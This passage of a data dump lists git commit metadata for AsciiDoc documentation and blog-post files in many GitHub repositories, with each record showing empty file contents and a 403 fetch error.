arch,shreejay\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,kalimatas\/elasticsearch,scorpionvicky\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,gingerwizard\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,mohit\/elasticsearch,LeoYao\/elasticsearch,wenpos\/elasticsearch,nknize\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,qwerty4030\/elasticsearch,gfyoung\/elasticsearch,maddin2016\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,pozhidaevak\/elasticsearch,fred84\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,scorpionvicky\/elasticsearch,maddin2016\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,vroyer\/elassandra,strapdata\/elassandra,shreejay\/elasticsearch,jimczi\/elasticsearch,brandonkearby\/elasticsearch,vroyer\/elassandra,gfyoung\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elasticassandra,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,scottsom\/elasticsearch,naveenhooda2000\/elasticsearch,nezirus\/elasticsearch,GlenRSmith\/elasticsearch,jimczi\/elasticsearch,naveenhooda2000\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,gingerwizard\/elasticsearch,mohit\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,umeshdangat\/elasticsearch,qwerty4030\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,HonzaKral\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,qwerty4030\/elasticsearch,shreejay\/elasticsearch,nknize\/elasticsearch,uschindler\/elasticsearch,wenpos\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,rajanm\/elasticsearch,scorpionvicky\/elasticsearch,lks21c\/elasticsearch,nezirus\/elasticsearch,kalimatas\/elasticsearch,Stacey-Gammon\/elasticsearch,naveenhooda2000\/elasticsearch,Stacey-Gammon\/elasticsearch,brandonkearby\/elasticsearch,brandonkearby\/elasticsearch,nezirus\/elasticsearch,lks21c\/elasticsearch,Stacey-Gammon\/elasticsearch,rajanm\/elasticsearch,wangtuo\/elasticsearch,uschindler\/elasticsearch,mjason3\/elasticsearch,markwalkom\/elasticsearch,rajanm\/elasticsearch,naveenhooda2000\/elasticsearch,shreejay\/elasticsearch,sneivandt\/elasticsearch,s1monw\/elasticsearch,gfyoung\/elasticsearch,wenpos\/elasticsearch,strapdata\/elassandra,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,scottsom\/elasticsearch,uschindler\/elasticsea
rch,mohit\/elasticsearch,markwalkom\/elasticsearch,markwalkom\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,umeshdangat\/elasticsearch,LeoYao\/elasticsearch,pozhidaevak\/elasticsearch,wangtuo\/elasticsearch,jimczi\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,strapdata\/elassandra,brandonkearby\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,fred84\/elasticsearch,nknize\/elasticsearch,mohit\/elasticsearch,pozhidaevak\/elasticsearch,s1monw\/elasticsearch,lks21c\/elasticsearch,wenpos\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,HonzaKral\/elasticsearch,rajanm\/elasticsearch,umeshdangat\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,wangtuo\/elasticsearch,masaruh\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,masaruh\/elasticsearch,coding0011\/elasticsearch,s1monw\/elasticsearch,scottsom\/elasticsearch,gingerwizard\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,HonzaKral\/elasticsearch,mjason3\/elasticsearch","old_file":"docs\/reference\/search\/suggesters\/completion-suggest.asciidoc","new_file":"docs\/reference\/search\/suggesters\/completion-suggest.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"826765f7cf6cbdd0d3fc169bfbbdbbee3931f686","subject":"Update 2016-06-12-This-is-another-post.adoc","message":"Update 2016-06-12-This-is-another-post.adoc","repos":"thesagarsutar\/hubpress,thesagarsutar\/hubpress,thesagarsutar\/hubpress,thesagarsutar\/hubpress","old_file":"_posts\/2016-06-12-This-is-another-post.adoc","new_file":"_posts\/2016-06-12-This-is-another-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thesagarsutar\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ba5637f46c4157cf37fadc7c80db871340f8bc2","subject":"CL: Fix library name","message":"CL: Fix library name\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"77781fcddce6b329f3c4f4420fdd51dd5c9fb19e","subject":"Added school section","message":"Added school section\n","repos":"andrewazores\/homepage","old_file":"school.adoc","new_file":"school.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andrewazores\/homepage.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"358ba4ff52697303b8c2f797789090b82e9ca11f","subject":"Added Ruby language to Gitbook","message":"Added Ruby language to 
Gitbook\n","repos":"bhaveshdt\/camel,anoordover\/camel,DariusX\/camel,Thopap\/camel,sverkera\/camel,lburgazzoli\/camel,tkopczynski\/camel,veithen\/camel,driseley\/camel,JYBESSON\/camel,akhettar\/camel,akhettar\/camel,gautric\/camel,dmvolod\/camel,Thopap\/camel,jamesnetherton\/camel,zregvart\/camel,hqstevenson\/camel,CodeSmell\/camel,salikjan\/camel,mgyongyosi\/camel,ssharma\/camel,chirino\/camel,drsquidop\/camel,christophd\/camel,sverkera\/camel,scranton\/camel,hqstevenson\/camel,snurmine\/camel,apache\/camel,ullgren\/camel,christophd\/camel,ssharma\/camel,christophd\/camel,RohanHart\/camel,rmarting\/camel,onders86\/camel,NickCis\/camel,lburgazzoli\/camel,gautric\/camel,pmoerenhout\/camel,dmvolod\/camel,rmarting\/camel,pmoerenhout\/camel,acartapanis\/camel,jonmcewen\/camel,mgyongyosi\/camel,driseley\/camel,ullgren\/camel,tadayosi\/camel,gilfernandes\/camel,chirino\/camel,bgaudaen\/camel,bgaudaen\/camel,mcollovati\/camel,snurmine\/camel,yuruki\/camel,sabre1041\/camel,mgyongyosi\/camel,drsquidop\/camel,Fabryprog\/camel,jonmcewen\/camel,acartapanis\/camel,yuruki\/camel,tlehoux\/camel,nicolaferraro\/camel,veithen\/camel,alvinkwekel\/camel,prashant2402\/camel,veithen\/camel,bhaveshdt\/camel,nicolaferraro\/camel,anoordover\/camel,pax95\/camel,RohanHart\/camel,RohanHart\/camel,davidkarlsen\/camel,curso007\/camel,hqstevenson\/camel,isavin\/camel,jarst\/camel,RohanHart\/camel,Thopap\/camel,tdiesler\/camel,pmoerenhout\/camel,Thopap\/camel,neoramon\/camel,christophd\/camel,DariusX\/camel,onders86\/camel,adessaigne\/camel,akhettar\/camel,salikjan\/camel,prashant2402\/camel,w4tson\/camel,adessaigne\/camel,sabre1041\/camel,gnodet\/camel,lburgazzoli\/camel,nikhilvibhav\/camel,neoramon\/camel,gnodet\/camel,veithen\/camel,bgaudaen\/camel,driseley\/camel,lburgazzoli\/camel,sabre1041\/camel,yuruki\/camel,drsquidop\/camel,sabre1041\/camel,pax95\/camel,ssharma\/camel,neoramon\/camel,NickCis\/camel,bgaudaen\/camel,tadayosi\/camel,sverkera\/camel,dmvolod\/camel,tadayosi\/camel,sirlatrom\/camel,DariusX\/camel,tadayosi\/camel,alvinkwekel\/camel,nicolaferraro\/camel,pax95\/camel,pkletsko\/camel,acartapanis\/camel,curso007\/camel,JYBESSON\/camel,rmarting\/camel,chirino\/camel,CodeSmell\/camel,scranton\/camel,dmvolod\/camel,isavin\/camel,cunningt\/camel,jarst\/camel,apache\/camel,sverkera\/camel,sabre1041\/camel,jamesnetherton\/camel,sirlatrom\/camel,scranton\/camel,drsquidop\/camel,rmarting\/camel,anoordover\/camel,gilfernandes\/camel,drsquidop\/camel,pkletsko\/camel,driseley\/camel,curso007\/camel,Thopap\/camel,jonmcewen\/camel,sverkera\/camel,gautric\/camel,jarst\/camel,lburgazzoli\/apache-camel,pmoerenhout\/camel,JYBESSON\/camel,curso007\/camel,isavin\/camel,scranton\/camel,punkhorn\/camel-upstream,acartapanis\/camel,jarst\/camel,prashant2402\/camel,punkhorn\/camel-upstream,gilfernandes\/camel,RohanHart\/camel,nboukhed\/camel,w4tson\/camel,tdiesler\/camel,objectiser\/camel,neoramon\/camel,NickCis\/camel,Fabryprog\/camel,JYBESSON\/camel,lburgazzoli\/camel,yuruki\/camel,sverkera\/camel,nboukhed\/camel,tkopczynski\/camel,apache\/camel,mcollovati\/camel,chirino\/camel,NickCis\/camel,cunningt\/camel,lburgazzoli\/apache-camel,alvinkwekel\/camel,nikhilvibhav\/camel,JYBESSON\/camel,veithen\/camel,DariusX\/camel,veithen\/camel,w4tson\/camel,lburgazzoli\/apache-camel,tkopczynski\/camel,gilfernandes\/camel,bhaveshdt\/camel,bhaveshdt\/camel,adessaigne\/camel,RohanHart\/camel,mcollovati\/camel,jarst\/camel,sabre1041\/camel,anoordover\/camel,akhettar\/camel,ullgren\/camel,anton-k11\/camel,adessaigne\/camel,kevinearls\/camel,jon
mcewen\/camel,rmarting\/camel,akhettar\/camel,ssharma\/camel,onders86\/camel,tdiesler\/camel,curso007\/camel,cunningt\/camel,jamesnetherton\/camel,snurmine\/camel,anton-k11\/camel,gnodet\/camel,jkorab\/camel,driseley\/camel,cunningt\/camel,apache\/camel,sirlatrom\/camel,Thopap\/camel,tadayosi\/camel,prashant2402\/camel,mgyongyosi\/camel,anoordover\/camel,dmvolod\/camel,anton-k11\/camel,sirlatrom\/camel,tadayosi\/camel,nboukhed\/camel,pmoerenhout\/camel,lburgazzoli\/apache-camel,bgaudaen\/camel,allancth\/camel,cunningt\/camel,bhaveshdt\/camel,jkorab\/camel,hqstevenson\/camel,punkhorn\/camel-upstream,jonmcewen\/camel,Fabryprog\/camel,sirlatrom\/camel,yuruki\/camel,kevinearls\/camel,objectiser\/camel,gnodet\/camel,tlehoux\/camel,anton-k11\/camel,bgaudaen\/camel,neoramon\/camel,anoordover\/camel,mgyongyosi\/camel,ssharma\/camel,davidkarlsen\/camel,tkopczynski\/camel,allancth\/camel,mcollovati\/camel,pkletsko\/camel,NickCis\/camel,tlehoux\/camel,ullgren\/camel,davidkarlsen\/camel,acartapanis\/camel,lburgazzoli\/apache-camel,lburgazzoli\/camel,kevinearls\/camel,w4tson\/camel,nikhilvibhav\/camel,snurmine\/camel,christophd\/camel,tkopczynski\/camel,cunningt\/camel,tdiesler\/camel,allancth\/camel,Fabryprog\/camel,jamesnetherton\/camel,CodeSmell\/camel,pkletsko\/camel,onders86\/camel,nboukhed\/camel,allancth\/camel,pax95\/camel,gautric\/camel,objectiser\/camel,anton-k11\/camel,zregvart\/camel,gilfernandes\/camel,sirlatrom\/camel,zregvart\/camel,pax95\/camel,neoramon\/camel,gnodet\/camel,adessaigne\/camel,dmvolod\/camel,nboukhed\/camel,jarst\/camel,rmarting\/camel,gautric\/camel,ssharma\/camel,tkopczynski\/camel,gautric\/camel,curso007\/camel,akhettar\/camel,chirino\/camel,snurmine\/camel,chirino\/camel,nboukhed\/camel,pmoerenhout\/camel,allancth\/camel,lburgazzoli\/apache-camel,nikhilvibhav\/camel,bhaveshdt\/camel,tdiesler\/camel,kevinearls\/camel,yuruki\/camel,tlehoux\/camel,prashant2402\/camel,hqstevenson\/camel,tdiesler\/camel,JYBESSON\/camel,w4tson\/camel,davidkarlsen\/camel,apache\/camel,jonmcewen\/camel,NickCis\/camel,jkorab\/camel,pkletsko\/camel,w4tson\/camel,gilfernandes\/camel,CodeSmell\/camel,pkletsko\/camel,objectiser\/camel,acartapanis\/camel,kevinearls\/camel,isavin\/camel,mgyongyosi\/camel,scranton\/camel,driseley\/camel,punkhorn\/camel-upstream,jkorab\/camel,adessaigne\/camel,jamesnetherton\/camel,zregvart\/camel,snurmine\/camel,isavin\/camel,jkorab\/camel,allancth\/camel,tlehoux\/camel,kevinearls\/camel,jkorab\/camel,isavin\/camel,apache\/camel,onders86\/camel,drsquidop\/camel,prashant2402\/camel,alvinkwekel\/camel,tlehoux\/camel,scranton\/camel,pax95\/camel,onders86\/camel,anton-k11\/camel,nicolaferraro\/camel,christophd\/camel,jamesnetherton\/camel,hqstevenson\/camel","old_file":"components\/camel-script\/src\/main\/docs\/ruby-language.adoc","new_file":"components\/camel-script\/src\/main\/docs\/ruby-language.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/allancth\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3dce11859f27706555cd1c1a1cf7ca2620714364","subject":"Deleted _posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","message":"Deleted 
_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","new_file":"_posts\/2018-03-21-They-Creativity-is-something-you-get-by-birth-and-Me-Oh-Really.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e8952551440d1b95c3b7446b02e57cbd0bd264c6","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dcdda5f4bb133dcb0c7bb373669334d04c93bdd","subject":"Update 2016-02-12-Interface-became-awesome-in-Java-8.adoc","message":"Update 2016-02-12-Interface-became-awesome-in-Java-8.adoc","repos":"tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io,tedroeloffzen\/tedroeloffzen.github.io","old_file":"_posts\/2016-02-12-Interface-became-awesome-in-Java-8.adoc","new_file":"_posts\/2016-02-12-Interface-became-awesome-in-Java-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tedroeloffzen\/tedroeloffzen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c288cce3cbbe30941964d9f3a1ab24b73b66c5bf","subject":"Update 2015-07-14-Sometimes-You-Need-To-Pay-It-Forward.adoc","message":"Update 2015-07-14-Sometimes-You-Need-To-Pay-It-Forward.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2015-07-14-Sometimes-You-Need-To-Pay-It-Forward.adoc","new_file":"_posts\/2015-07-14-Sometimes-You-Need-To-Pay-It-Forward.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0aeae9aa4da59ebb946f4255ade9e0644aa22f0","subject":"Add logging conventions to the development doc","message":"Add logging conventions to the development 
doc\n","repos":"jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,tsegismont\/hawkular.github.io,tsegismont\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io,jsanda\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,jpkrohling\/hawkular.github.io,lucasponce\/hawkular.github.io,tsegismont\/hawkular.github.io,pilhuhn\/hawkular.github.io,jotak\/hawkular.github.io,jpkrohling\/hawkular.github.io,hawkular\/hawkular.github.io,jsanda\/hawkular.github.io,pilhuhn\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_file":"src\/main\/jbake\/content\/docs\/dev\/development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c0f38c6883bcc0e8bcd18feeb13f3e8fbba32a15","subject":"Update 2016-02-09-My-title2.adoc","message":"Update 2016-02-09-My-title2.adoc","repos":"pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io,pej\/hubpress.io","old_file":"_posts\/2016-02-09-My-title2.adoc","new_file":"_posts\/2016-02-09-My-title2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pej\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3fe1fd82fa2dc3bc2d2f0164865a2be66d5bb430","subject":"Update 2018-11-25-Amazon-Go.adoc","message":"Update 2018-11-25-Amazon-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_file":"_posts\/2018-11-25-Amazon-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d4aa56e9d1fbac7ab851f6db5c347acac319b957","subject":"Update 2015-02-20-Mistaken-Million.adoc","message":"Update 2015-02-20-Mistaken-Million.adoc","repos":"fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io,fqure\/fqure.github.io","old_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_file":"_posts\/2015-02-20-Mistaken-Million.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fqure\/fqure.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"771aa053fa160cd9a9e04ca12df9e79465f4932b","subject":"Shorter and modernized and commented out Papyrus","message":"Shorter and modernized and commented out Papyrus\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Automated Eclipse install.adoc","new_file":"Automated Eclipse install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9565e65c0f1ef89d08811eafc9908fa2df72a0ab","subject":"Update donts.adoc","message":"Update donts.adoc\n\nCleaned up list.\r\nDeleted unnecessary new line characters.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/contributions\/tonegodgui\/donts.adoc","new_file":"src\/docs\/asciidoc\/jme3\/contributions\/tonegodgui\/donts.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jMonkeyEngine\/wiki.jmonkeyengine.org.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"85abceb087307e2806002e066ea64d40fc6318e2","subject":"Changes to documentation","message":"Changes to documentation\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e633fd078f626f83c50ee817fd1b6b1fcf46dd85","subject":"Correction of url in documentation","message":"Correction of url in documentation\n","repos":"Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb,Armatiek\/xslweb","old_file":"docs\/XSLWeb Developer Manual.adoc","new_file":"docs\/XSLWeb Developer Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Armatiek\/xslweb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7e308efd130b3c31b6aee69fc4ba1e44ac681f4d","subject":"Create typescript.adoc","message":"Create typescript.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"typescript.adoc","new_file":"typescript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"cce3d4fcc13a274c419836c4873ac87a3622db0f","subject":"y2b create post Samsung Galaxy Note 3 Unboxing!","message":"y2b create post Samsung Galaxy Note 3 Unboxing!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-26-Samsung-Galaxy-Note-3-Unboxing.adoc","new_file":"_posts\/2013-09-26-Samsung-Galaxy-Note-3-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5edd13a0c4256d1eb710549ed5ce865deeb74353","subject":"Update 2015-11-24-Real-life-tips-for-using-VueJs.adoc","message":"Update 
2015-11-24-Real-life-tips-for-using-VueJs.adoc","repos":"rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au,rrrhys\/blog.codeworkshop.com.au","old_file":"_posts\/2015-11-24-Real-life-tips-for-using-VueJs.adoc","new_file":"_posts\/2015-11-24-Real-life-tips-for-using-VueJs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rrrhys\/blog.codeworkshop.com.au.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39c2782f6875822a9858507097f80ad035c75212","subject":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","message":"Update 2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_file":"_posts\/2016-04-07-Is-it-me-What-am-I-doing-wrong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0880c00f7558b238c5c98bc63ac03c8f3566fc7a","subject":"Update 2016-10-19-Consultor-de-Investimentos.adoc","message":"Update 2016-10-19-Consultor-de-Investimentos.adoc","repos":"ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io,ricardozanini\/ricardozanini.github.io","old_file":"_posts\/2016-10-19-Consultor-de-Investimentos.adoc","new_file":"_posts\/2016-10-19-Consultor-de-Investimentos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ricardozanini\/ricardozanini.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e22f33c4090fe54770e8c358747a1534df2e8f2b","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"21e7dd662868b278e59bfa57f261afc31ba3e95d","subject":"Update 2015-03-22-Retrofit-UI-Commands-in-The-Pinball-Arcade-using-NVidia-Gamepad-Mapper.adoc","message":"Update 2015-03-22-Retrofit-UI-Commands-in-The-Pinball-Arcade-using-NVidia-Gamepad-Mapper.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2015-03-22-Retrofit-UI-Commands-in-The-Pinball-Arcade-using-NVidia-Gamepad-Mapper.adoc","new_file":"_posts\/2015-03-22-Retrofit-UI-Commands-in-The-Pinball-Arcade-using-NVidia-Gamepad-Mapper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc2da15672a039c6d6a9de3b5a653b274e4b136c","subject":"Initial doc for invoice_plugin","message":"Initial doc for invoice_plugin\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/invoice_plugin.adoc","new_file":"userguide\/tutorials\/invoice_plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"572ac00f67f0889ec136e0fb74f840ec2a8fc7bc","subject":"y2b create post Crystal White PlayStation 3 Limited Edition Bundle Unboxing (White PS3)","message":"y2b create post Crystal White PlayStation 3 Limited Edition Bundle Unboxing (White PS3)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-01-29-Crystal-White-PlayStation-3-Limited-Edition-Bundle-Unboxing-White-PS3.adoc","new_file":"_posts\/2013-01-29-Crystal-White-PlayStation-3-Limited-Edition-Bundle-Unboxing-White-PS3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"434d3fa012c061946a700795f4105b6e4a9b03b5","subject":"Update 2011-07-12-Security-Stack-Exchange.adoc","message":"Update 2011-07-12-Security-Stack-Exchange.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2011-07-12-Security-Stack-Exchange.adoc","new_file":"_posts\/2011-07-12-Security-Stack-Exchange.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"871465f18ccbf0b4a2f5ecd74e5331ebc8662de9","subject":"New Server adoc","message":"New Server 